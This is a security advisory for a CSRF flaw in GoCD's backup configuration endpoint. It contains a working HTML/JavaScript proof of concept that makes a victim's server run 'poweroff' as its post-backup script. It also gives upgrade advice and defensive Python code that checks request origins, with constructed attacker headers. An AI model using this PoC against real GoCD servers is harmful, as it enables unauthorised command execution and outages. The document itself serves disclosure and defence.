Overview
In GoCD, versions 19.6.0 to 21.1.0 are vulnerable to Cross-Site Request Forgery because the `/go/api/config/backup` endpoint has no CSRF protection. An attacker can trick a victim into clicking a malicious link that changes the backup configuration, including placing a system command in the post_backup_script field.
Details
GoCD can be abused through Cross-Site Request Forgery because the `/go/api/config/backup` endpoint has no CSRF protection. Due to this flaw, an attacker who entices a user to visit an attacker-controlled website can change the victim's backup configuration settings, such as placing a system command in the post_backup_script field and changing the backup schedule.
PoC Details
Create an HTML file with the content below. When an authenticated user clicks on a malicious link sent by the attacker, a CSRF request is sent to the legitimate server and the backup configuration is changed.
PoC Code
<html>
<script>
function backup() {
    // The browser attaches the victim's session cookie (withCredentials),
    // and the endpoint accepts the request without any CSRF token.
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.withCredentials = true;
    xmlhttp.open("POST", "http://localhost:8153/go/api/config/backup", true);
    xmlhttp.setRequestHeader("Accept", "application/vnd.go.cd.v1+json");
    xmlhttp.send(JSON.stringify({
        "schedule": null,
        "post_backup_script": "poweroff",
        "email_on_success": false,
        "email_on_failure": false
    }));
}
backup();
</script>
</html>
Affected Environments
19.6.0-21.1.0
Prevention
Upgrade to 21.2.0
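The server-side check this endpoint lacked, as an added defensive example; it is not GoCD's code or its 21.2.0 fix, and the header values, the `attacker.example` hostname and the session cookie are constructed. It trusts Fetch Metadata (Sec-Fetch-Site) when present and falls back to Origin/Referer comparison for browsers that do not send it:

```python
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def _origin_of(url):
    """Reduce a URL to its lowercase scheme://host[:port] origin, or None."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower() if p.scheme and p.netloc else None


def csrf_check(method, headers, site_origin):
    """Decide whether a cookie-authenticated request may change state.

    Returns (allowed, reason). Safe methods are exempt. If Sec-Fetch-Site
    is present, only 'same-origin' or 'none' (typed URL/bookmark) passes;
    otherwise Origin, or Referer as a fallback, must equal the site origin.
    A state-changing request with none of these headers is refused:
    browsers always attach Origin to a cross-site XHR POST, so its absence
    means a non-browser client, which should use token auth, not cookies.
    """
    if method.upper() not in STATE_CHANGING:
        return True, "safe-method"
    h = {k.lower(): v for k, v in headers.items()}
    fetch_site = h.get("sec-fetch-site")
    if fetch_site is not None:
        return fetch_site in ("same-origin", "none"), f"sec-fetch-site={fetch_site}"
    source = h.get("origin") or h.get("referer")
    if not source:
        return False, "no-origin-or-referer"
    if _origin_of(source) != _origin_of(site_origin):
        return False, "origin-mismatch"
    return True, "origin-match"


# Constructed PoC headers, as a browser sends them from the lure page.
POC_HEADERS = {
    "Origin": "http://attacker.example",
    "Referer": "http://attacker.example/lure.html",
    "Sec-Fetch-Site": "cross-site",
    "Accept": "application/vnd.go.cd.v1+json",
    "Cookie": "JSESSIONID=<constructed>",
}

# The same call issued from GoCD's own backup settings page.
SAME_ORIGIN_HEADERS = {
    "Origin": "http://localhost:8153",
    "Sec-Fetch-Site": "same-origin",
    "Cookie": "JSESSIONID=<constructed>",
}
```

Only requests authenticated by a session cookie need this guard; clients using a bearer or API token carry no ambient credential, so the check can be skipped for them.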